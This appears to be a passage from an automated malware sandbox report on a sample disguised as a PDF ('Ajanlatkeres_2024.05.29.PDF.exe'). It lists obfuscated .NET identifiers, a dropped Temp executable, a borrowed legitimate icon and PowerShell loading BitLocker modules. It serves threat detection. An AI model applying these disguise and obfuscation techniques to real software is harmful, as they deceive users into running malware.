Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, JFb09MUSuxo51US2ALU.cs	High entropy of concatenated method names: 'Sd4T4xmsDx', 'EA3TJgXhSu', 'liUT6ZRXvi', 'j28TDdOfFi', 'RnpTp21vHX', 'hwwT3RBYl7', 'SOuToHqqiB', 'y0aTOwfhUQ', 'Yn2TR0qQPr', 'Dp7T2NM13V'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, uOTRDQYa6GFfWcpRFN.cs	High entropy of concatenated method names: 'LmKsMSXc0D', 'uG5sWgsIAh', 'ToString', 'Tf4sqQAwl4', 'pMIsQfFy8o', 'OwksKRF3yv', 'FreswGAO14', 'f40smtvjS2', 'QDVsg23osL', 'FvSsID5soE'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, Bs4sJE1jbd8b9NXEWB.cs	High entropy of concatenated method names: 'dsbTUX9DC2', 'xvmT8fF6f9', 'DybTVuxqWn', 'iBHTqFpVG4', 'xglTQ87dvA', 'Bc4Twv7Ovo', 'fBpTmpmLZe', 'eodZnL9CeY', 'ncCZhoxe8P', 'mGeZekwbsL'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, sPOqLThX3yn1oth9QS.cs	High entropy of concatenated method names: 'ClLZqFNUKa', 'GVVZQaXxvD', 'nYjZKU5X8n', 'Mt9ZwfcPf2', 'yC8ZmThNGi', 'TwHZgvdGfm', 'tOqZIpiNFP', 'YhsZfijJWC', 'HeJZMN2ixP', 'HMeZWKT2RF'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, C3XKhaiuGdAc0xUTDj.cs	High entropy of concatenated method names: 'SQ77O0XyOd', 'KXT7RO8oAk', 'YMI7vE77ai', 'x2E7LorF7I', 'gM57Cr57MC', 'GkV7PsIWQm', 'uYj7jT0Tq6', 'f1n79AlBhP', 'cg27FHLPhB', 'UYx7tppbl0'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, qbtJKQ587GLMigp6EV.cs	High entropy of concatenated method names: 'e2dcFA0KdR', 'Vx9ckHS4u6', 'Fc6c5HvYTa', 'nyMcBqVJaD', 'PFBcLUBvfb', 'LQscdseWda', 'ILKcCwiOte', 'U3IcPBJGCR', 'dh5cxrjp10', 'Q7YcjqXlBG'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, MDyrFajJr1JqHHKQDM.cs	High entropy of concatenated method names: 'GLdgqNQXcn', 'ebygKYla21', 'NkhgmWkN5Z', 'Fp0m1Yrpvj', 'fHSmzqkSf3', 'veLgSop4Ku', 'MIZgUiimlM', 'ueIgAbgwsZ', 'kM1g81huZD', 'R9IgVTCZoS'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, jUedmmIQbjpaEiUIOJ.cs	High entropy of concatenated method names: 'fFb8u6TBtL', 'c768qPuWqf', 'tYL8Qs7JuF', 'DHa8Ki2F95', 'Dud8wW3fHS', 'Jds8mtFPs6', 'z9V8gAOYNe', 'ILp8I4NXad', 'weN8fj1fqo', 'nrA8MyELD4'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, IsUAwXe9lCh0M0PFNq.cs	High entropy of concatenated method names: 'gATZvJDB49', 'JAEZLe24Gj', 'dKkZdgDad0', 'yQ7ZCCPGuQ', 'L0FZ5QR4qp', 'sSuZPFtlGU', 'Next', 'Next', 'Next', 'NextBytes'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, rpNde5QNVAXKIacF0g.cs	High entropy of concatenated method names: 'Dispose', 'G1wUedjPcK', 'NcxAL2hlhJ', 'O3S00cUOwx', 'jaPU1OqLTX', 'BynUz1oth9', 'ProcessDialogKey', 'gSCASsUAwX', 'MlCAUh0M0P', 'NNqAAps4sJ'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, CvHZcyU8wvhFvOlGSyg.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nZMa5fy0sH', 'IxfaBBrQfo', 'xbta0HMBrJ', 'ziZaYaiRZR', 'dhWaGuCyVn', 'UWaayXbNEZ', 'm7canM1vr1'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, eaTp1SAcY98ypEXBtP.cs	High entropy of concatenated method names: 'Bsu657PdG', 'xqgDB9whD', 'NZG3L3ZCT', 'buRovPd9d', 'phWRELd4e', 'Kid2fV9eD', 'wXbeT06yLhOPKXMneR', 'kgPAdkHPhHMp8bc5Zm', 'TQ8ZU1idW', 'GBLaEN7Ag'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, zlYB3GUUWLlLkNHJq7j.cs	High entropy of concatenated method names: 'ToString', 'OGRa8tWID9', 'N9iaVnqy4f', 'mloauMfx9i', 'a2Waqrw0yp', 'oPjaQxhEAs', 'MLGaKPAJXr', 'iXZawo7oC8', 'MiWLY9hBjdgYQp0wTqf', 'v7uEk6h3g6mnZJOtyge'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, B72amw2DFTdvkx3jt9.cs	High entropy of concatenated method names: 'uCNwpoE7Bp', 'LLawoQs5fe', 'O8gKdjHaGn', 'LNYKCx8odj', 'Sa4KPGmM86', 'qbgKxA7QVB', 'bpnKjFsw9m', 'GTgK9jGk0U', 'WEwKNfEXG3', 'nAOKFpgXOO'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, g6xgpULPC8T1YdP2US.cs	High entropy of concatenated method names: 'aOCJyeR72KjZ2jwmH9d', 'XDEYMcRJ4iI8okh2gcO', 'GwpmZE2N3Z', 'np5mTV3Bxv', 'H6Imavorir', 'kj6g6pRu3iha07LQxiM', 'A6MDfDR5bwjaPIfg1lK'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, Lve0Wbv1fAmfkSJ7xN.cs	High entropy of concatenated method names: 'SmJmuFfs9U', 'fqcmQCOrH8', 'woMmwjceYH', 'SkQmg43NaK', 'wHimImynDg', 'G97wG2g39k', 'EDfwySLUVU', 'OeHwng1RyB', 'N4xwheK29O', 'bhMwebAcA4'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, xFLBrsOc76AdDA34nm.cs	High entropy of concatenated method names: 'BcSQ5uMNxu', 'pRvQBaidf7', 'fBqQ0v38jS', 'JN4QYPkZVo', 'shsQGH74TD', 'lijQyJuNq6', 'UC3Qn4rvy2', 'znMQhqQUjp', 'LDdQe5PKxp', 'j3jQ10FrKW'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, KP5ATsVgId7OXBUdeV.cs	High entropy of concatenated method names: 'Xp4UgFLBrs', 'o76UIAdDA3', 'djdUMXyv4k', 'u8IUW7372a', 'K3jUct99ve', 'SWbUr1fAmf', 'CIWM843rGdBkBFhGbg', 'GO7lGfTHRvosal3yAl', 'GJpUU1A7pP', 'xqtU80mXUA'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, e7b2V8RjdXyv4kH8I7.cs	High entropy of concatenated method names: 'IgyKDcFQCB', 'dapK3pi6hr', 'aqDKODBFMg', 'KrJKRuasfd', 'QsuKcbhA7j', 'VYLKrYK0D5', 'wZ7KsUONxh', 'jHeKZHkqMe', 'nYyKT6JfDE', 'QahKaIAknF'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, y9Ec3dNVelmRgxq7LE.cs	High entropy of concatenated method names: 'tFVg4dfrfv', 'r1bgJDc8Uy', 'fJjg6P7rGT', 'zWHgDtIeKG', 'Kopgp0eQeN', 'hhsg3c1n7v', 'AMFgotF8gv', 'FcqgOLv5EX', 'zPSgRCaqMS', 'Iqqg2Pw3BV'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7200000.8.raw.unpack, GVWMM5yX6okaexqC4I.cs	High entropy of concatenated method names: 'QeCshG6GS9', 'hZLs1DAZ7m', 'DJeZSl8El1', 'rkiZUXHpN1', 'LfXstyHbiJ', 'wZCskUPHmS', 'z58si7cG04', 'hbTs59OxFt', 'jygsBlF0ca', 'iCes0WS2jN'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, JFb09MUSuxo51US2ALU.cs	High entropy of concatenated method names: 'Sd4T4xmsDx', 'EA3TJgXhSu', 'liUT6ZRXvi', 'j28TDdOfFi', 'RnpTp21vHX', 'hwwT3RBYl7', 'SOuToHqqiB', 'y0aTOwfhUQ', 'Yn2TR0qQPr', 'Dp7T2NM13V'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, uOTRDQYa6GFfWcpRFN.cs	High entropy of concatenated method names: 'LmKsMSXc0D', 'uG5sWgsIAh', 'ToString', 'Tf4sqQAwl4', 'pMIsQfFy8o', 'OwksKRF3yv', 'FreswGAO14', 'f40smtvjS2', 'QDVsg23osL', 'FvSsID5soE'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, Bs4sJE1jbd8b9NXEWB.cs	High entropy of concatenated method names: 'dsbTUX9DC2', 'xvmT8fF6f9', 'DybTVuxqWn', 'iBHTqFpVG4', 'xglTQ87dvA', 'Bc4Twv7Ovo', 'fBpTmpmLZe', 'eodZnL9CeY', 'ncCZhoxe8P', 'mGeZekwbsL'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, sPOqLThX3yn1oth9QS.cs	High entropy of concatenated method names: 'ClLZqFNUKa', 'GVVZQaXxvD', 'nYjZKU5X8n', 'Mt9ZwfcPf2', 'yC8ZmThNGi', 'TwHZgvdGfm', 'tOqZIpiNFP', 'YhsZfijJWC', 'HeJZMN2ixP', 'HMeZWKT2RF'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, C3XKhaiuGdAc0xUTDj.cs	High entropy of concatenated method names: 'SQ77O0XyOd', 'KXT7RO8oAk', 'YMI7vE77ai', 'x2E7LorF7I', 'gM57Cr57MC', 'GkV7PsIWQm', 'uYj7jT0Tq6', 'f1n79AlBhP', 'cg27FHLPhB', 'UYx7tppbl0'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, qbtJKQ587GLMigp6EV.cs	High entropy of concatenated method names: 'e2dcFA0KdR', 'Vx9ckHS4u6', 'Fc6c5HvYTa', 'nyMcBqVJaD', 'PFBcLUBvfb', 'LQscdseWda', 'ILKcCwiOte', 'U3IcPBJGCR', 'dh5cxrjp10', 'Q7YcjqXlBG'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, MDyrFajJr1JqHHKQDM.cs	High entropy of concatenated method names: 'GLdgqNQXcn', 'ebygKYla21', 'NkhgmWkN5Z', 'Fp0m1Yrpvj', 'fHSmzqkSf3', 'veLgSop4Ku', 'MIZgUiimlM', 'ueIgAbgwsZ', 'kM1g81huZD', 'R9IgVTCZoS'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, jUedmmIQbjpaEiUIOJ.cs	High entropy of concatenated method names: 'fFb8u6TBtL', 'c768qPuWqf', 'tYL8Qs7JuF', 'DHa8Ki2F95', 'Dud8wW3fHS', 'Jds8mtFPs6', 'z9V8gAOYNe', 'ILp8I4NXad', 'weN8fj1fqo', 'nrA8MyELD4'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, IsUAwXe9lCh0M0PFNq.cs	High entropy of concatenated method names: 'gATZvJDB49', 'JAEZLe24Gj', 'dKkZdgDad0', 'yQ7ZCCPGuQ', 'L0FZ5QR4qp', 'sSuZPFtlGU', 'Next', 'Next', 'Next', 'NextBytes'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, rpNde5QNVAXKIacF0g.cs	High entropy of concatenated method names: 'Dispose', 'G1wUedjPcK', 'NcxAL2hlhJ', 'O3S00cUOwx', 'jaPU1OqLTX', 'BynUz1oth9', 'ProcessDialogKey', 'gSCASsUAwX', 'MlCAUh0M0P', 'NNqAAps4sJ'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, CvHZcyU8wvhFvOlGSyg.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'nZMa5fy0sH', 'IxfaBBrQfo', 'xbta0HMBrJ', 'ziZaYaiRZR', 'dhWaGuCyVn', 'UWaayXbNEZ', 'm7canM1vr1'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, eaTp1SAcY98ypEXBtP.cs	High entropy of concatenated method names: 'Bsu657PdG', 'xqgDB9whD', 'NZG3L3ZCT', 'buRovPd9d', 'phWRELd4e', 'Kid2fV9eD', 'wXbeT06yLhOPKXMneR', 'kgPAdkHPhHMp8bc5Zm', 'TQ8ZU1idW', 'GBLaEN7Ag'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, zlYB3GUUWLlLkNHJq7j.cs	High entropy of concatenated method names: 'ToString', 'OGRa8tWID9', 'N9iaVnqy4f', 'mloauMfx9i', 'a2Waqrw0yp', 'oPjaQxhEAs', 'MLGaKPAJXr', 'iXZawo7oC8', 'MiWLY9hBjdgYQp0wTqf', 'v7uEk6h3g6mnZJOtyge'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, B72amw2DFTdvkx3jt9.cs	High entropy of concatenated method names: 'uCNwpoE7Bp', 'LLawoQs5fe', 'O8gKdjHaGn', 'LNYKCx8odj', 'Sa4KPGmM86', 'qbgKxA7QVB', 'bpnKjFsw9m', 'GTgK9jGk0U', 'WEwKNfEXG3', 'nAOKFpgXOO'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, g6xgpULPC8T1YdP2US.cs	High entropy of concatenated method names: 'aOCJyeR72KjZ2jwmH9d', 'XDEYMcRJ4iI8okh2gcO', 'GwpmZE2N3Z', 'np5mTV3Bxv', 'H6Imavorir', 'kj6g6pRu3iha07LQxiM', 'A6MDfDR5bwjaPIfg1lK'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, Lve0Wbv1fAmfkSJ7xN.cs	High entropy of concatenated method names: 'SmJmuFfs9U', 'fqcmQCOrH8', 'woMmwjceYH', 'SkQmg43NaK', 'wHimImynDg', 'G97wG2g39k', 'EDfwySLUVU', 'OeHwng1RyB', 'N4xwheK29O', 'bhMwebAcA4'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, xFLBrsOc76AdDA34nm.cs	High entropy of concatenated method names: 'BcSQ5uMNxu', 'pRvQBaidf7', 'fBqQ0v38jS', 'JN4QYPkZVo', 'shsQGH74TD', 'lijQyJuNq6', 'UC3Qn4rvy2', 'znMQhqQUjp', 'LDdQe5PKxp', 'j3jQ10FrKW'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, KP5ATsVgId7OXBUdeV.cs	High entropy of concatenated method names: 'Xp4UgFLBrs', 'o76UIAdDA3', 'djdUMXyv4k', 'u8IUW7372a', 'K3jUct99ve', 'SWbUr1fAmf', 'CIWM843rGdBkBFhGbg', 'GO7lGfTHRvosal3yAl', 'GJpUU1A7pP', 'xqtU80mXUA'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, e7b2V8RjdXyv4kH8I7.cs	High entropy of concatenated method names: 'IgyKDcFQCB', 'dapK3pi6hr', 'aqDKODBFMg', 'KrJKRuasfd', 'QsuKcbhA7j', 'VYLKrYK0D5', 'wZ7KsUONxh', 'jHeKZHkqMe', 'nYyKT6JfDE', 'QahKaIAknF'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, y9Ec3dNVelmRgxq7LE.cs	High entropy of concatenated method names: 'tFVg4dfrfv', 'r1bgJDc8Uy', 'fJjg6P7rGT', 'zWHgDtIeKG', 'Kopgp0eQeN', 'hhsg3c1n7v', 'AMFgotF8gv', 'FcqgOLv5EX', 'zPSgRCaqMS', 'Iqqg2Pw3BV'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.412cbd0.5.raw.unpack, GVWMM5yX6okaexqC4I.cs	High entropy of concatenated method names: 'QeCshG6GS9', 'hZLs1DAZ7m', 'DJeZSl8El1', 'rkiZUXHpN1', 'LfXstyHbiJ', 'wZCskUPHmS', 'z58si7cG04', 'hbTs59OxFt', 'jygsBlF0ca', 'iCes0WS2jN'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7be0000.9.raw.unpack, K4VVbTCGN4q2c8lCCj.cs	High entropy of concatenated method names: 'G3KbyTLLkM4Bb', 'si9SO65af8rO14mjPDU', 'bBffTJ5RQH5OqC4Gea9', 'ovKlj65mCkfoxl0nYKf', 'BWF7CK5kxuHeQeFkeiK', 'qwHs9D5fCc7yK8DUC5g', 'CQU41K5NJrprlOnEHS0', 'RhSTw15QcpoAFlp1KXj', 'nntNvk5jVxrl8qAx10M', 'uNAC9m5VOKsj7MEAs02'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7be0000.9.raw.unpack, q1bUrWhd8NtMR4Tat2.cs	High entropy of concatenated method names: 'FtMrR4Tat', 'asVbu6B2r', 'BfjKHvjWV', 'r8MoiUGvh', 'dTGON4q2c', 'brXv00T5r', 'Dispose', 'q1bhUrWd8', 'zN8XoTN4OjYAicjyxg', 'ruXo51Q9ZfIq3o9q7i'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.7be0000.9.raw.unpack, RLhDAEYwfjHvjWVq5a.cs	High entropy of concatenated method names: 'An354LdEp', 'zbMnKODFs', 'B6jqN3UrZ', 'QkT3JtuA7', 'rmgQyVns4', 'CtlpashST', 'Bh5RaqMVd', 'PW46FiDNh', 'W34ldUSmX', 'AVZwxu1MB'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2ec5d84.1.raw.unpack, K4VVbTCGN4q2c8lCCj.cs	High entropy of concatenated method names: 'G3KbyTLLkM4Bb', 'si9SO65af8rO14mjPDU', 'bBffTJ5RQH5OqC4Gea9', 'ovKlj65mCkfoxl0nYKf', 'BWF7CK5kxuHeQeFkeiK', 'qwHs9D5fCc7yK8DUC5g', 'CQU41K5NJrprlOnEHS0', 'RhSTw15QcpoAFlp1KXj', 'nntNvk5jVxrl8qAx10M', 'uNAC9m5VOKsj7MEAs02'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2ec5d84.1.raw.unpack, q1bUrWhd8NtMR4Tat2.cs	High entropy of concatenated method names: 'FtMrR4Tat', 'asVbu6B2r', 'BfjKHvjWV', 'r8MoiUGvh', 'dTGON4q2c', 'brXv00T5r', 'Dispose', 'q1bhUrWd8', 'zN8XoTN4OjYAicjyxg', 'ruXo51Q9ZfIq3o9q7i'
Source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2ec5d84.1.raw.unpack, RLhDAEYwfjHvjWVq5a.cs	High entropy of concatenated method names: 'An354LdEp', 'zbMnKODFs', 'B6jqN3UrZ', 'QkT3JtuA7', 'rmgQyVns4', 'CtlpashST', 'Bh5RaqMVd', 'PW46FiDNh', 'W34ldUSmX', 'AVZwxu1MB'
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, uZFmmbBhNvbryEJbSq.cs	High entropy of concatenated method names: 'YyW6cI8HNx', 'X2u6EJQNut', 'SwZ6NdJWfL', 'AW662uYY3Y', 'jnu6JBiCAB', 'FXK69Cv18t', 'EZU6MtpH4Y', 'wnk635t74s', 'Q0O6LV5NIa', 'Tcf6Ddx2Il'
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, UmGI57hwbJqkH0RjZh.cs	High entropy of concatenated method names: 'OXgG1xwdY4', 'TGaGfg1ovn', 'zGMG8EgxNG', 'XCJGARqFrq', 'eVEGY8Hrjp', 'Cc2GtjJTm9', 'b5xGFUYY4y', 'hJXRqmgwBF', 'P4RRxGHS1J', 'eiPRlVUpZc'
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, vtbp6H4XMgROcN0Se2T.cs	High entropy of concatenated method names: 'Hi4GwIFyee', 'djSGSYWAU6', 'nvEGsYrTxi', 'FPgGi6sQkh', 'lOSGCRfBon', 'kOtGOPCfIP', 'MjjGr3CrYm', 'iMJGWM5GOa', 'QuYG7A9tLj', 'IhvGP5f6J5'
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, ikrS6OrutL3CBZSZ4R.cs	High entropy of concatenated method names: 'ToString', 'epIg4en7ty', 'SaqgJZZoM1', 'l4ag9tBqRA', 'phEgMErXRP', 'vcTg3iAc7y', 'G8NgLvEqoK', 'o08gDGPTCS', 'HuUgIpW5TQ', 'tGpgvLnY3b'
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, IPOy3Y1udLGY2UOY89.cs	High entropy of concatenated method names: 'AUPFmD3RKO', 'gOxFYgLbn6', 'XOUFtiAnq3', 'GhUFaOpoTe', 'V2cFTOOsFP', 'vNetBpwelp', 'iPbtVhb3vc', 'oOqtqpNxUh', 'HUxtxFqUYJ', 'kcbtlPbZpP'
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, l6PBra3RZ7f3E4VSeC.cs	High entropy of concatenated method names: 'woWniSg32o', 'R20nOuuSpC', 'AyAnWagRAN', 'RPbn7AUGD3', 'bZ5n6HJirp', 'Y2mngxd0i9', 'RdUn5h7KXc', 'bt2nRUfGk2', 'HyAnGN7eep', 'm69nXolHYt'
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, h2df4pn6d2N4C8egS2.cs	High entropy of concatenated method names: 'q52YNSFSxK', 'ioSY2nqLCb', 'y5TYh3lKrj', 'qtoYpeMuaY', 'S80YBeF6wW', 'uKxYVSDCZc', 'Ec5YqYJkoJ', 'LsKYx3WxZL', 'lGjYloyl8p', 'CqIYjfo3I9'
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, BVvQkKGnivA0dbGJTm.cs	High entropy of concatenated method names: 'K0afmGuYnX', 'iYtfAiOiFg', 'Tk3fYlAdjZ', 'EkkfnMXT6d', 'OLVftmZMS3', 'PJCfF8DuaQ', 'frpfa9pfr8', 'fbofT5fJBA', 'rGufKbsGG2', 'g9jfZL1MLy'
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, n9HqQr4eZW6QZX9oQuD.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'x1KXNTg11j', 'MMyX20IBhr', 'JCKXhrxbZf', 'mcoXpid2fH', 'BU3XBEHUK9', 'JFwXVwyCr3', 'bpoXqyO3TE'
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, mjp9oQM5T6DfksQfjX.cs	High entropy of concatenated method names: 'UvGRbkQSyV', 'RySRJ6BQZj', 'pfyR9OJb9d', 'aCeRMcZx71', 'N5WRN4HmjD', 'cdDR3W745K', 'Next', 'Next', 'Next', 'NextBytes'
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, JY1vamScMM9FQrFBji.cs	High entropy of concatenated method names: 'Rav5ZrnKoZ', 'L3d5y1Gb3R', 'ToString', 'k9c5AXLyGw', 'OP75YIrluQ', 'z0w5n2LFc6', 'LHd5tqhm7e', 'S8h5FL00sK', 'tQ05aojgOs', 'jC65TlyeNT'
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, qci77OCC0SLuseQv06.cs	High entropy of concatenated method names: 'DuPRAJeYpS', 'z4PRYc8Up4', 'cyqRn7XpNb', 'wlBRt8bMB5', 'ExoRFsT0ni', 'pXBRa13rPL', 'XbPRTyNOqB', 'JCiRKNuOFv', 'HaqRZ0q8kg', 'zrWRynMQi5'
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, F9R13D5t4ym96j8XnF.cs	High entropy of concatenated method names: 'ldJdWGoac3', 'KmDd7XsuQo', 'nkSdb0ELLh', 'WpUdJqJfFo', 'yG7dMd6CIJ', 'yYcd3CtUKu', 'k5RdDglGXg', 'lQvdIFTB7I', 'rl1dckWJnL', 'XbKd4hZ6DC'
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, SNNgg3QtqAC90WQDqG.cs	High entropy of concatenated method names: 'hk7tCAEhbg', 'tSotr0KisW', 'Cbqn9CKhLq', 'OUbnMIsu0a', 'Ruhn3Oygis', 'lkXnLPvDAT', 'QHxnD5avFl', 'AZanISqjlD', 'W2UnvB7A3Y', 'uQmncPXNlZ'
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, cddkCfWykMInk9AHwu.cs	High entropy of concatenated method names: 'Dispose', 'zPr1lg2mGH', 'vmrHJqlB5N', 'd3booRHrZl', 'BFF1jw28YI', 'zMr1z2JvSm', 'ProcessDialogKey', 'xakH0whoAW', 'VrtH1jyxfu', 'lYWHHeWNvU'
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, xeeKOrTxmKsKK2MI89.cs	High entropy of concatenated method names: 'yyE5xLuYLW', 'Vgx5jGAWoL', 'CBtR0rbdPx', 'yhbR1M16H9', 'PpQ54qSPyE', 'LS45EIn84u', 'xel5QZNd8d', 's5Y5NeFpE6', 'GYM52TXWWp', 'vgH5hIQm9i'
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, D5EXegz0NJ6bN5yNEA.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gn2GdTAmAD', 'y0IG6u5blu', 'FjPGgUMp7j', 'cTpG54kmrh', 'MOUGRuX3KE', 'viLGGx2ofm', 'JlOGXn5lO6'
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, yblEaqHBrW68NLZC9b.cs	High entropy of concatenated method names: 'l68awRkCPk', 'RqUaSyk2h1', 'HocasPo7bd', 'YiVaiag3Dc', 'DLjaCbGSsf', 'Yx6aO6ejiW', 'cgJarxLnNI', 'ph0aWysFQ7', 'kRia7wiJH8', 'rrCaP9JnJP'
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, lS8uNLZybT9wX8f2Yw.cs	High entropy of concatenated method names: 'l1B1acZQoF', 'AhE1TnkY2K', 'S5O1ZDCIbX', 'k631yiMBUI', 'wHo16EmIbq', 'JaF1gAaNdv', 'qjsYKR9qLK7NTcPBMA', 'euMhIsuZcbKyuJAYWe', 'b6v11P2yLc', 'q3u1fNBeH9'
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, KWg9TJLvr7HVKQhRsW.cs	High entropy of concatenated method names: 'f7Rs5746o', 'p75i8Oia5', 'k9EOfsMBj', 'npLriyt3M', 'rmG7Ssrt6', 'xPJPRybyJ', 'Lfj0f8i9FKFQv354Ow', 'Mv7sdVlvbcdvahpumr', 'x9HROrrZn', 'YoDXEp5Ws'
Source: 14.2.YLc7afPlL4RjCeK.exe.7730000.8.raw.unpack, dOVG8cvcqoP12cvV28.cs	High entropy of concatenated method names: 'kufaAKqXvf', 'hFyan2JLWq', 'pumaFVOCbV', 'xMnFj7gU7n', 'vKJFzTHeXn', 'phDa0GHthd', 'v6Va1F1bpo', 'bitaHHPAQE', 'oukafLcDFa', 'rWoa8hpubI'

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe

File created: C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Source: initial sample

Icon embedded in binary file: icon matches a legit application icon: download (29).png

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
